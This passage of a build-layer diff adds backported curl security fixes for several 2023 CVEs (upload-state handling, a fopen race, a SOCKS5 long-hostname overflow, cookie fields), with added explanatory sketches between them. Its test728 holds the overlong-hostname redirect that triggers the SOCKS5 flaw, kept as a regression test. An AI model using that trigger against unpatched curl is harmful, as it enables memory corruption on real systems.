++ {"fe80::3285:a9ff:fe46:b619", "fe80::3285:a9ff:fe46:b619", TRUE},
++ {NULL, NULL, FALSE}
++};
+
+-/* only these backends define the tested functions */
+-#if defined(USE_OPENSSL) || defined(USE_GSKIT)
++UNITTEST_START
++{
++ int i;
++ for(i = 0; tests[i].host; i++) {
++ if(tests[i].match != Curl_cert_hostcheck(tests[i].pattern,
++ tests[i].host)) {
++ fprintf(stderr,
++ "HOST: %s\n"
++ "PTRN: %s\n"
++ "did %sMATCH\n",
++ tests[i].host,
++ tests[i].pattern,
++ tests[i].match ? "NOT ": "");
++ unitfail++;
++ }
++ }
++}
+
+- /* here you start doing things and checking that the results are good */
++UNITTEST_STOP
++#else
+
+-fail_unless(Curl_cert_hostcheck("www.example.com", "www.example.com"),
+- "good 1");
+-fail_unless(Curl_cert_hostcheck("*.example.com", "www.example.com"),
+- "good 2");
+-fail_unless(Curl_cert_hostcheck("xxx*.example.com", "xxxwww.example.com"),
+- "good 3");
+-fail_unless(Curl_cert_hostcheck("f*.example.com", "foo.example.com"),
+- "good 4");
+-fail_unless(Curl_cert_hostcheck("192.168.0.0", "192.168.0.0"),
+- "good 5");
+-
+-fail_if(Curl_cert_hostcheck("xxx.example.com", "www.example.com"), "bad 1");
+-fail_if(Curl_cert_hostcheck("*", "www.example.com"), "bad 2");
+-fail_if(Curl_cert_hostcheck("*.*.com", "www.example.com"), "bad 3");
+-fail_if(Curl_cert_hostcheck("*.example.com", "baa.foo.example.com"), "bad 4");
+-fail_if(Curl_cert_hostcheck("f*.example.com", "baa.example.com"), "bad 5");
+-fail_if(Curl_cert_hostcheck("*.com", "example.com"), "bad 6");
+-fail_if(Curl_cert_hostcheck("*fail.com", "example.com"), "bad 7");
+-fail_if(Curl_cert_hostcheck("*.example.", "www.example."), "bad 8");
+-fail_if(Curl_cert_hostcheck("*.example.", "www.example"), "bad 9");
+-fail_if(Curl_cert_hostcheck("", "www"), "bad 10");
+-fail_if(Curl_cert_hostcheck("*", "www"), "bad 11");
+-fail_if(Curl_cert_hostcheck("*.168.0.0", "192.168.0.0"), "bad 12");
+-fail_if(Curl_cert_hostcheck("www.example.com", "192.168.0.0"), "bad 13");
+-
+-#ifdef ENABLE_IPV6
+-fail_if(Curl_cert_hostcheck("*::3285:a9ff:fe46:b619",
+- "fe80::3285:a9ff:fe46:b619"), "bad 14");
+-fail_unless(Curl_cert_hostcheck("fe80::3285:a9ff:fe46:b619",
+- "fe80::3285:a9ff:fe46:b619"), "good 6");
+-#endif
++UNITTEST_START
+
++UNITTEST_STOP
+ #endif
+
+- /* you end the test code like this: */
+-
+-UNITTEST_STOP
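
The rewritten hostmatch() only honours a wildcard when the leftmost label of the pattern is exactly "*" and the pattern keeps at least two further labels. A much simplified standalone sketch of that rule (no IP-address or trailing-dot handling, unlike the real function):

    #include <stdbool.h>
    #include <stdio.h>
    #include <string.h>
    #include <strings.h>

    static bool wildcard_match(const char *pattern, const char *host)
    {
      const char *pdot, *hdot;

      if(strncmp(pattern, "*.", 2))
        return strcasecmp(pattern, host) == 0;   /* no leading "*.": exact match only */
      pdot = strchr(pattern, '.');
      if(!pdot || !strchr(pdot + 1, '.'))
        return strcasecmp(pattern, host) == 0;   /* "*.tld" is too wide a wildcard */
      hdot = strchr(host, '.');
      if(!hdot)
        return false;
      return strcasecmp(pdot, hdot) == 0;        /* wildcard covers exactly one label */
    }

    int main(void)
    {
      printf("%d\n", wildcard_match("*.example.com", "foo.example.com"));  /* 1 */
      printf("%d\n", wildcard_match("*.example.com", "a.b.example.com"));  /* 0 */
      printf("%d\n", wildcard_match("f*.example.com", "foo.example.com")); /* 0: partial wildcards rejected */
      return 0;
    }
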
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28322.patch b/meta/recipes-support/curl/curl/CVE-2023-28322.patch
new file mode 100644
index 0000000000..9351a2c286
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28322.patch
@@ -0,0 +1,380 @@
+CVE: CVE-2023-28322
+Upstream-Status: Backport [ import patch from ubuntu curl_7.68.0-1ubuntu2.20
+upstream https://github.com/curl/curl/commit/7815647d6582c0a4900be2e1de ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+Backport of:
+
+From 7815647d6582c0a4900be2e1de6c5e61272c496b Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 25 Apr 2023 08:28:01 +0200
+Subject: [PATCH] lib: unify the upload/method handling
+
+By making sure we set state.upload based on the set.method value and not
+independently as set.upload, we reduce confusion and mixup risks, both
+internally and externally.
+
+Closes #11017
+---
+ lib/curl_rtmp.c | 4 ++--
+ lib/file.c | 4 ++--
+ lib/ftp.c | 8 ++++----
+ lib/http.c | 4 ++--
+ lib/imap.c | 6 +++---
+ lib/rtsp.c | 4 ++--
+ lib/setopt.c | 6 ++----
+ lib/smb.c | 6 +++---
+ lib/smtp.c | 4 ++--
+ lib/tftp.c | 8 ++++----
+ lib/transfer.c | 4 ++--
+ lib/urldata.h | 2 +-
+ lib/vssh/libssh.c | 6 +++---
+ lib/vssh/libssh2.c | 6 +++---
+ lib/vssh/wolfssh.c | 2 +-
+ 15 files changed, 36 insertions(+), 38 deletions(-)
+
+--- a/lib/curl_rtmp.c
++++ b/lib/curl_rtmp.c
+@@ -213,7 +213,7 @@ static CURLcode rtmp_connect(struct conn
+ /* We have to know if it's a write before we send the
+ * connect request packet
+ */
+- if(conn->data->set.upload)
++ if(conn->data->state.upload)
+ r->Link.protocol |= RTMP_FEATURE_WRITE;
+
+ /* For plain streams, use the buffer toggle trick to keep data flowing */
+@@ -245,7 +245,7 @@ static CURLcode rtmp_do(struct connectda
+ if(!RTMP_ConnectStream(r, 0))
+ return CURLE_FAILED_INIT;
+
+- if(conn->data->set.upload) {
++ if(conn->data->state.upload) {
+ Curl_pgrsSetUploadSize(data, data->state.infilesize);
+ Curl_setup_transfer(data, -1, -1, FALSE, FIRSTSOCKET);
+ }
+--- a/lib/file.c
++++ b/lib/file.c
+@@ -198,7 +198,7 @@ static CURLcode file_connect(struct conn
+ file->freepath = real_path; /* free this when done */
+
+ file->fd = fd;
+- if(!data->set.upload && (fd == -1)) {
++ if(!data->state.upload && (fd == -1)) {
+ failf(data, "Couldn't open file %s", data->state.up.path);
+ file_done(conn, CURLE_FILE_COULDNT_READ_FILE, FALSE);
+ return CURLE_FILE_COULDNT_READ_FILE;
+@@ -390,7 +390,7 @@ static CURLcode file_do(struct connectda
+
+ Curl_pgrsStartNow(data);
+
+- if(data->set.upload)
++ if(data->state.upload)
+ return file_upload(conn);
+
+ file = conn->data->req.protop;
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -1371,7 +1371,7 @@ static CURLcode ftp_state_prepare_transf
+ data->set.str[STRING_CUSTOMREQUEST]:
+ (data->set.ftp_list_only?"NLST":"LIST"));
+ }
+- else if(data->set.upload) {
++ else if(data->state.upload) {
+ PPSENDF(&conn->proto.ftpc.pp, "PRET STOR %s", conn->proto.ftpc.file);
+ }
+ else {
+@@ -3303,7 +3303,7 @@ static CURLcode ftp_done(struct connectd
+ /* the response code from the transfer showed an error already so no
+ use checking further */
+ ;
+- else if(data->set.upload) {
++ else if(data->state.upload) {
+ if((-1 != data->state.infilesize) &&
+ (data->state.infilesize != data->req.writebytecount) &&
+ !data->set.crlf &&
+@@ -3570,7 +3570,7 @@ static CURLcode ftp_do_more(struct conne
+ connected back to us */
+ }
+ }
+- else if(data->set.upload) {
++ else if(data->state.upload) {
+ result = ftp_nb_type(conn, data->set.prefer_ascii, FTP_STOR_TYPE);
+ if(result)
+ return result;
+@@ -4209,7 +4209,7 @@ CURLcode ftp_parse_url_path(struct conne
+ ftpc->file = NULL; /* instead of point to a zero byte,
+ we make it a NULL pointer */
+
+- if(data->set.upload && !ftpc->file && (ftp->transfer == FTPTRANSFER_BODY)) {
++ if(data->state.upload && !ftpc->file && (ftp->transfer == FTPTRANSFER_BODY)) {
+ /* We need a file name when uploading. Return error! */
+ failf(data, "Uploading to a URL without a file name!");
+ free(rawPath);
+--- a/lib/http.c
++++ b/lib/http.c
+@@ -2080,7 +2080,7 @@ CURLcode Curl_http(struct connectdata *c
+ }
+
+ if((conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_FTP)) &&
+- data->set.upload) {
++ data->state.upload) {
+ httpreq = HTTPREQ_PUT;
+ }
+
+@@ -2261,7 +2261,7 @@ CURLcode Curl_http(struct connectdata *c
+ if((conn->handler->protocol & PROTO_FAMILY_HTTP) &&
+ (((httpreq == HTTPREQ_POST_MIME || httpreq == HTTPREQ_POST_FORM) &&
+ http->postsize < 0) ||
+- ((data->set.upload || httpreq == HTTPREQ_POST) &&
++ ((data->state.upload || httpreq == HTTPREQ_POST) &&
+ data->state.infilesize == -1))) {
+ if(conn->bits.authneg)
+ /* don't enable chunked during auth neg */
+--- a/lib/imap.c
++++ b/lib/imap.c
+@@ -1469,11 +1469,11 @@ static CURLcode imap_done(struct connect
+ result = status; /* use the already set error code */
+ }
+ else if(!data->set.connect_only && !imap->custom &&
+- (imap->uid || imap->mindex || data->set.upload ||
++ (imap->uid || imap->mindex || data->state.upload ||
+ data->set.mimepost.kind != MIMEKIND_NONE)) {
+ /* Handle responses after FETCH or APPEND transfer has finished */
+
+- if(!data->set.upload && data->set.mimepost.kind == MIMEKIND_NONE)
++ if(!data->state.upload && data->set.mimepost.kind == MIMEKIND_NONE)
+ state(conn, IMAP_FETCH_FINAL);
+ else {
+ /* End the APPEND command first by sending an empty line */
+@@ -1539,7 +1539,7 @@ static CURLcode imap_perform(struct conn
+ selected = TRUE;
+
+ /* Start the first command in the DO phase */
+- if(conn->data->set.upload || data->set.mimepost.kind != MIMEKIND_NONE)
++ if(conn->data->state.upload || data->set.mimepost.kind != MIMEKIND_NONE)
+ /* APPEND can be executed directly */
+ result = imap_perform_append(conn);
+ else if(imap->custom && (selected || !imap->mailbox))
+--- a/lib/rtsp.c
++++ b/lib/rtsp.c
+@@ -499,7 +499,7 @@ static CURLcode rtsp_do(struct connectda
+ rtspreq == RTSPREQ_SET_PARAMETER ||
+ rtspreq == RTSPREQ_GET_PARAMETER) {
+
+- if(data->set.upload) {
++ if(data->state.upload) {
+ putsize = data->state.infilesize;
+ data->set.httpreq = HTTPREQ_PUT;
+
+@@ -518,7 +518,7 @@ static CURLcode rtsp_do(struct connectda
+ result =
+ Curl_add_bufferf(&req_buffer,
+ "Content-Length: %" CURL_FORMAT_CURL_OFF_T"\r\n",
+- (data->set.upload ? putsize : postsize));
++ (data->state.upload ? putsize : postsize));
+ if(result)
+ return result;
+ }
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -258,8 +258,8 @@ CURLcode Curl_vsetopt(struct Curl_easy *
+ * We want to sent data to the remote host. If this is HTTP, that equals
+ * using the PUT request.
+ */
+- data->set.upload = (0 != va_arg(param, long)) ? TRUE : FALSE;
+- if(data->set.upload) {
++ arg = va_arg(param, long);
++ if(arg) {
+ /* If this is HTTP, PUT is what's needed to "upload" */
+ data->set.httpreq = HTTPREQ_PUT;
+ data->set.opt_no_body = FALSE; /* this is implied */
+@@ -486,7 +486,6 @@ CURLcode Curl_vsetopt(struct Curl_easy *
+ }
+ else
+ data->set.httpreq = HTTPREQ_GET;
+- data->set.upload = FALSE;
+ break;
+
+ case CURLOPT_COPYPOSTFIELDS:
+@@ -797,7 +796,6 @@ CURLcode Curl_vsetopt(struct Curl_easy *
+ */
+ if(va_arg(param, long)) {
+ data->set.httpreq = HTTPREQ_GET;
+- data->set.upload = FALSE; /* switch off upload */
+ data->set.opt_no_body = FALSE; /* this is implied */
+ }
+ break;
+--- a/lib/smb.c
++++ b/lib/smb.c
+@@ -516,7 +516,7 @@ static CURLcode smb_send_open(struct con
+ byte_count = strlen(req->path);
+ msg.name_length = smb_swap16((unsigned short)byte_count);
+ msg.share_access = smb_swap32(SMB_FILE_SHARE_ALL);
+- if(conn->data->set.upload) {
++ if(conn->data->state.upload) {
+ msg.access = smb_swap32(SMB_GENERIC_READ | SMB_GENERIC_WRITE);
+ msg.create_disposition = smb_swap32(SMB_FILE_OVERWRITE_IF);
+ }
+@@ -792,7 +792,7 @@ static CURLcode smb_request_state(struct
+ smb_m = (const struct smb_nt_create_response*) msg;
+ req->fid = smb_swap16(smb_m->fid);
+ conn->data->req.offset = 0;
+- if(conn->data->set.upload) {
++ if(conn->data->state.upload) {
+ conn->data->req.size = conn->data->state.infilesize;
+ Curl_pgrsSetUploadSize(conn->data, conn->data->req.size);
+ next_state = SMB_UPLOAD;
+--- a/lib/smtp.c
++++ b/lib/smtp.c
+@@ -1210,7 +1210,7 @@ static CURLcode smtp_done(struct connect
+ result = status; /* use the already set error code */
+ }
+ else if(!data->set.connect_only && data->set.mail_rcpt &&
+- (data->set.upload || data->set.mimepost.kind)) {
++ (data->state.upload || data->set.mimepost.kind)) {
+ /* Calculate the EOB taking into account any terminating CRLF from the
+ previous line of the email or the CRLF of the DATA command when there
+ is "no mail data". RFC-5321, sect. 4.1.1.4.
+@@ -1297,7 +1297,7 @@ static CURLcode smtp_perform(struct conn
+ smtp->eob = 2;
+
+ /* Start the first command in the DO phase */
+- if((data->set.upload || data->set.mimepost.kind) && data->set.mail_rcpt)
++ if((data->state.upload || data->set.mimepost.kind) && data->set.mail_rcpt)
+ /* MAIL transfer */
+ result = smtp_perform_mail(conn);
+ else
+--- a/lib/tftp.c
++++ b/lib/tftp.c
+@@ -390,7 +390,7 @@ static CURLcode tftp_parse_option_ack(tf
+
+ /* tsize should be ignored on upload: Who cares about the size of the
+ remote file? */
+- if(!data->set.upload) {
++ if(!data->state.upload) {
+ if(!tsize) {
+ failf(data, "invalid tsize -:%s:- value in OACK packet", value);
+ return CURLE_TFTP_ILLEGAL;
+@@ -470,7 +470,7 @@ static CURLcode tftp_send_first(tftp_sta
+ return result;
+ }
+
+- if(data->set.upload) {
++ if(data->state.upload) {
+ /* If we are uploading, send an WRQ */
+ setpacketevent(&state->spacket, TFTP_EVENT_WRQ);
+ state->conn->data->req.upload_fromhere =
+@@ -505,7 +505,7 @@ static CURLcode tftp_send_first(tftp_sta
+ if(!data->set.tftp_no_options) {
+ char buf[64];
+ /* add tsize option */
+- if(data->set.upload && (data->state.infilesize != -1))
++ if(data->state.upload && (data->state.infilesize != -1))
+ msnprintf(buf, sizeof(buf), "%" CURL_FORMAT_CURL_OFF_T,
+ data->state.infilesize);
+ else
+@@ -559,7 +559,7 @@ static CURLcode tftp_send_first(tftp_sta
+ break;
+
+ case TFTP_EVENT_OACK:
+- if(data->set.upload) {
++ if(data->state.upload) {
+ result = tftp_connect_for_tx(state, event);
+ }
+ else {
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1405,6 +1405,7 @@ void Curl_init_CONNECT(struct Curl_easy
+ {
+ data->state.fread_func = data->set.fread_func_set;
+ data->state.in = data->set.in_set;
++ data->state.upload = (data->set.httpreq == HTTPREQ_PUT);
+ }
+
+ /*
+@@ -1816,7 +1817,7 @@ CURLcode Curl_retry_request(struct conne
+
+ /* if we're talking upload, we can't do the checks below, unless the protocol
+ is HTTP as when uploading over HTTP we will still get a response */
+- if(data->set.upload &&
++ if(data->state.upload &&
+ !(conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_RTSP)))
+ return CURLE_OK;
+
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1427,6 +1427,7 @@ struct UrlState {
+ BIT(stream_depends_e); /* set or don't set the Exclusive bit */
+ BIT(previouslypending); /* this transfer WAS in the multi->pending queue */
+ BIT(cookie_engine);
++ BIT(upload); /* upload request */
+ };
+
+
+@@ -1762,7 +1763,6 @@ struct UserDefined {
+ BIT(http_auto_referer); /* set "correct" referer when following
+ location: */
+ BIT(opt_no_body); /* as set with CURLOPT_NOBODY */
+- BIT(upload); /* upload request */
+ BIT(verbose); /* output verbosity */
+ BIT(krb); /* Kerberos connection requested */
+ BIT(reuse_forbid); /* forbidden to be reused, close after use */
+--- a/lib/vssh/libssh.c
++++ b/lib/vssh/libssh.c
+@@ -1076,7 +1076,7 @@ static CURLcode myssh_statemach_act(stru
+ }
+
+ case SSH_SFTP_TRANS_INIT:
+- if(data->set.upload)
++ if(data->state.upload)
+ state(conn, SSH_SFTP_UPLOAD_INIT);
+ else {
+ if(protop->path[strlen(protop->path)-1] == '/')
+@@ -1686,7 +1686,7 @@ static CURLcode myssh_statemach_act(stru
+ /* Functions from the SCP subsystem cannot handle/return SSH_AGAIN */
+ ssh_set_blocking(sshc->ssh_session, 1);
+
+- if(data->set.upload) {
++ if(data->state.upload) {
+ if(data->state.infilesize < 0) {
+ failf(data, "SCP requires a known file size for upload");
+ sshc->actualcode = CURLE_UPLOAD_FAILED;
+@@ -1787,7 +1787,7 @@ static CURLcode myssh_statemach_act(stru
+ break;
+ }
+ case SSH_SCP_DONE:
+- if(data->set.upload)
++ if(data->state.upload)
+ state(conn, SSH_SCP_SEND_EOF);
+ else
+ state(conn, SSH_SCP_CHANNEL_FREE);
+--- a/lib/vssh/libssh2.c
++++ b/lib/vssh/libssh2.c
+@@ -1664,7 +1664,7 @@ static CURLcode ssh_statemach_act(struct
+ }
+
+ case SSH_SFTP_TRANS_INIT:
+- if(data->set.upload)
++ if(data->state.upload)
+ state(conn, SSH_SFTP_UPLOAD_INIT);
+ else {
+ if(sftp_scp->path[strlen(sftp_scp->path)-1] == '/')
+@@ -2366,7 +2366,7 @@ static CURLcode ssh_statemach_act(struct
+ break;
+ }
+
+- if(data->set.upload) {
++ if(data->state.upload) {
+ if(data->state.infilesize < 0) {
+ failf(data, "SCP requires a known file size for upload");
+ sshc->actualcode = CURLE_UPLOAD_FAILED;
+@@ -2504,7 +2504,7 @@ static CURLcode ssh_statemach_act(struct
+ break;
+
+ case SSH_SCP_DONE:
+- if(data->set.upload)
++ if(data->state.upload)
+ state(conn, SSH_SCP_SEND_EOF);
+ else
+ state(conn, SSH_SCP_CHANNEL_FREE);
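
The core of this change is that the per-transfer upload flag becomes derived state, computed from the configured method at the start of every transfer, instead of a second, independently settable option bit. A standalone sketch of that single-source-of-truth idea (enum and field names invented for illustration):

    #include <stdbool.h>
    #include <stdio.h>

    enum http_request { REQ_GET, REQ_PUT, REQ_POST };   /* invented names */

    struct transfer_state {
      enum http_request method;   /* what the user configured */
      bool upload;                /* derived at transfer start, never set directly */
    };

    static void init_transfer(struct transfer_state *s, enum http_request method)
    {
      s->method = method;
      s->upload = (method == REQ_PUT);   /* mirrors state.upload = (httpreq == HTTPREQ_PUT) */
    }

    int main(void)
    {
      struct transfer_state s;
      init_transfer(&s, REQ_PUT);
      printf("upload: %d\n", s.upload);   /* 1 */
      return 0;
    }
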
diff --git a/meta/recipes-support/curl/curl/CVE-2023-32001.patch b/meta/recipes-support/curl/curl/CVE-2023-32001.patch
new file mode 100644
index 0000000000..f533992bcd
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-32001.patch
@@ -0,0 +1,38 @@
+From 0c667188e0c6cda615a036b8a2b4125f2c404dde Mon Sep 17 00:00:00 2001
+From: SaltyMilk <soufiane.elmelcaoui@gmail.com>
+Date: Mon, 10 Jul 2023 21:43:28 +0200
+Subject: [PATCH] fopen: optimize
+
+Closes #11419
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/0c667188e0c6cda615a036b8a2b4125f2c404dde]
+CVE: CVE-2023-32001
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ lib/fopen.c | 12 ++++++------
+ 1 file changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/lib/fopen.c b/lib/fopen.c
+index c9c9e3d6e73a2..b6e3cadddef65 100644
+--- a/lib/fopen.c
++++ b/lib/fopen.c
+@@ -56,13 +56,13 @@ CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
+ int fd = -1;
+ *tempname = NULL;
+
+- if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {
+- /* a non-regular file, fallback to direct fopen() */
+- *fh = fopen(filename, FOPEN_WRITETEXT);
+- if(*fh)
+- return CURLE_OK;
++ *fh = fopen(filename, FOPEN_WRITETEXT);
++ if(!*fh)
+ goto fail;
+- }
++ if(fstat(fileno(*fh), &sb) == -1 || !S_ISREG(sb.st_mode))
++ return CURLE_OK;
++ fclose(*fh);
++ *fh = NULL;
+
+ result = Curl_rand_hex(data, randsuffix, sizeof(randsuffix));
+ if(result)
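
The reordering above closes a time-of-check/time-of-use window: instead of stat()ing the path and then opening it, the file is opened first and the already-open descriptor is fstat()ed, which cannot be raced by swapping the path between the two calls. A standalone sketch of the same ordering (return-value convention and file name are invented):

    #include <stdio.h>
    #include <sys/stat.h>

    /* -1: cannot open; 0: keep writing to *fh directly (not a regular file);
        1: regular file, the caller would take the temp-file + rename path */
    static int open_for_rewrite(const char *filename, FILE **fh)
    {
      struct stat sb;

      *fh = fopen(filename, "w");              /* open first ... */
      if(!*fh)
        return -1;
      if(fstat(fileno(*fh), &sb) == -1 || !S_ISREG(sb.st_mode))
        return 0;                              /* ... then inspect what was opened */
      fclose(*fh);
      *fh = NULL;
      return 1;
    }

    int main(void)
    {
      FILE *fh;
      printf("%d\n", open_for_rewrite("/tmp/example-cookiejar", &fh)); /* any scratch path */
      if(fh)
        fclose(fh);
      return 0;
    }
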
diff --git a/meta/recipes-support/curl/curl/CVE-2023-38545.patch b/meta/recipes-support/curl/curl/CVE-2023-38545.patch
new file mode 100644
index 0000000000..c6b6726886
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-38545.patch
@@ -0,0 +1,148 @@
+From 600a1caeb2312fdee5ef1caf7d613c12a8b2424a Mon Sep 17 00:00:00 2001
+From: Mike Crowe <mac@mcrowe.com>
+Date: Wed, 11 Oct 2023 20:50:28 +0100
+Subject: [PATCH] socks: return error if hostname too long for remote resolve
+To: libcurl development <curl-library@cool.haxx.se>
+
+Prior to this change the state machine attempted to change the remote
+resolve to a local resolve if the hostname was longer than 255
+characters. Unfortunately that did not work as intended and caused a
+security issue.
+
+Name resolvers cannot resolve hostnames longer than 255 characters.
+
+Bug: https://curl.se/docs/CVE-2023-38545.html
+
+Unfortunately CURLE_PROXY and CURLPX_LONG_HOSTNAME were introduced in
+7.73.0 so they can't be used in 7.69.1. Let's use
+CURLE_COULDNT_RESOLVE_HOST as the best available alternative and update
+the test appropriately.
+
+libcurl's test support has been improved considerably since 7.69.1 which
+means that the test must be modified to remove use of %VERSION and
+%TESTNUMBER and the stderr output can no longer be checked.
+
+CVE: CVE-2023-38545
+Upstream-Status: Backport [fb4415d8aee6c1045be932a34fe6107c2f5ed147]
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/socks.c | 13 +++++----
+ tests/data/Makefile.inc | 2 +-
+ tests/data/test728 | 60 +++++++++++++++++++++++++++++++++++++++++
+ 3 files changed, 69 insertions(+), 6 deletions(-)
+ create mode 100644 tests/data/test728
+
+diff --git a/lib/socks.c b/lib/socks.c
+index 37099130e..f3bf40533 100644
+--- a/lib/socks.c
++++ b/lib/socks.c
+@@ -521,11 +521,14 @@ CURLcode Curl_SOCKS5(const char *proxy_user,
+ infof(conn->data, "SOCKS5: connecting to HTTP proxy %s port %d\n",
+ hostname, remote_port);
+
+- /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
++ /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet. */
+ if(!socks5_resolve_local && hostname_len > 255) {
+- infof(conn->data, "SOCKS5: server resolving disabled for hostnames of "
+- "length > 255 [actual len=%zu]\n", hostname_len);
+- socks5_resolve_local = TRUE;
++ failf(data, "SOCKS5: the destination hostname is too long to be "
++ "resolved remotely by the proxy.");
++ /* This version of libcurl doesn't have CURLE_PROXY and
++ * therefore CURLPX_LONG_HOSTNAME, so let's report the best we
++ * can. */
++ return CURLE_COULDNT_RESOLVE_HOST;
+ }
+
+ if(auth & ~(CURLAUTH_BASIC | CURLAUTH_GSSAPI))
+@@ -837,7 +840,7 @@ CURLcode Curl_SOCKS5(const char *proxy_user,
+
+ if(!socks5_resolve_local) {
+ socksreq[len++] = 3; /* ATYP: domain name = 3 */
+- socksreq[len++] = (char) hostname_len; /* one byte address length */
++ socksreq[len++] = (unsigned char) hostname_len; /* one byte length */
+ memcpy(&socksreq[len], hostname, hostname_len); /* address w/o NULL */
+ len += hostname_len;
+ infof(data, "SOCKS5 connect to %s:%d (remotely resolved)\n",
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index 3d8565c36..5ee2284ff 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -89,7 +89,7 @@ test662 test663 test664 test665 test666 test667 test668 \
+ test670 test671 test672 test673 \
+ \
+ test700 test701 test702 test703 test704 test705 test706 test707 test708 \
+-test709 test710 test711 test712 test713 test714 test715 test716 test717 \
++test709 test710 test711 test712 test713 test714 test715 test716 test717 test728 \
+ \
+ test800 test801 test802 test803 test804 test805 test806 test807 test808 \
+ test809 test810 test811 test812 test813 test814 test815 test816 test817 \
+diff --git a/tests/data/test728 b/tests/data/test728
+new file mode 100644
+index 000000000..7b1d8b2f3
+--- /dev/null
++++ b/tests/data/test728
+@@ -0,0 +1,60 @@
++<testcase>
++<info>
++<keywords>
++HTTP
++HTTP GET
++SOCKS5
++SOCKS5h
++followlocation
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++# The hostname in this redirect is 256 characters and too long (> 255) for
++# SOCKS5 remote resolve. curl must return CURLE_COULDNT_RESOLVE_HOST in this case.
++<data>
++HTTP/1.1 301 Moved Permanently
++Location: http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
++Content-Length: 0
++Connection: close
++
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++proxy
++</features>
++<server>
++http
++socks5
++</server>
++ <name>
++SOCKS5h with HTTP redirect to hostname too long
++ </name>
++ <command>
++--no-progress-meter --location --proxy socks5h://%HOSTIP:%SOCKSPORT http://%HOSTIP:%HTTPPORT/728
++</command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++<strip>
++^User-Agent:.*
++</strip>
++<protocol>
++GET /728 HTTP/1.1
++Host: %HOSTIP:%HTTPPORT
++Accept: */*
++
++</protocol>
++<errorcode>
++6
++</errorcode>
++</verify>
++</testcase>
+--
+2.39.2
+
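
The guard added above reflects a hard protocol limit: a SOCKS5 request carries the destination name with a single length byte, so names longer than 255 bytes must be rejected outright rather than quietly truncated or switched to local resolving. A standalone sketch of building that part of the request (buffer layout simplified from socks.c, helper name invented):

    #include <stdio.h>
    #include <string.h>

    static int build_socks5_name(unsigned char *req, size_t reqsize,
                                 const char *hostname)
    {
      size_t len = 0;
      size_t hostname_len = strlen(hostname);

      if(hostname_len > 255)
        return -1;                 /* too long for the one-byte length field */
      if(reqsize < hostname_len + 2)
        return -1;

      req[len++] = 3;                              /* ATYP: domain name */
      req[len++] = (unsigned char)hostname_len;    /* one byte length */
      memcpy(&req[len], hostname, hostname_len);   /* name without NUL */
      return (int)(len + hostname_len);
    }

    int main(void)
    {
      unsigned char req[600];
      char longname[300];
      memset(longname, 'A', sizeof(longname) - 1);
      longname[sizeof(longname) - 1] = '\0';

      printf("%d\n", build_socks5_name(req, sizeof(req), "example.com")); /* 13 */
      printf("%d\n", build_socks5_name(req, sizeof(req), longname));      /* -1 */
      return 0;
    }
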
diff --git a/meta/recipes-support/curl/curl/CVE-2023-38546.patch b/meta/recipes-support/curl/curl/CVE-2023-38546.patch
new file mode 100644
index 0000000000..30ef2fd038
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-38546.patch
@@ -0,0 +1,132 @@
+From 7b67721f12cbe6ed1a41e7332f3b5a7186a5e23f Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 14 Sep 2023 23:28:32 +0200
+Subject: [PATCH] cookie: remove unnecessary struct fields
+To: libcurl development <curl-library@cool.haxx.se>
+
+Plus: reduce the hash table size from 256 to 63. It seems unlikely to
+make much of a speed difference for most use cases but saves 1.5KB of
+data per instance.
+
+Closes #11862
+
+This patch was taken from Debian's 7.64.0-4+deb10u7 package; it applied with
+only a little fuzz.
+
+CVE: CVE-2023-38546
+Upstream-Status: Backport [61275672b46d9abb32857404]
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/cookie.c | 13 +------------
+ lib/cookie.h | 7 ++-----
+ lib/easy.c | 4 +---
+ 3 files changed, 4 insertions(+), 20 deletions(-)
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index 68054e1c4..a378f28e1 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -114,7 +114,6 @@ static void freecookie(struct Cookie *co)
+ free(co->name);
+ free(co->value);
+ free(co->maxage);
+- free(co->version);
+ free(co);
+ }
+
+@@ -641,11 +640,7 @@ Curl_cookie_add(struct Curl_easy *data,
+ }
+ }
+ else if(strcasecompare("version", name)) {
+- strstore(&co->version, whatptr);
+- if(!co->version) {
+- badcookie = TRUE;
+- break;
+- }
++ /* just ignore */
+ }
+ else if(strcasecompare("max-age", name)) {
+ /* Defined in RFC2109:
+@@ -1042,7 +1037,6 @@ Curl_cookie_add(struct Curl_easy *data,
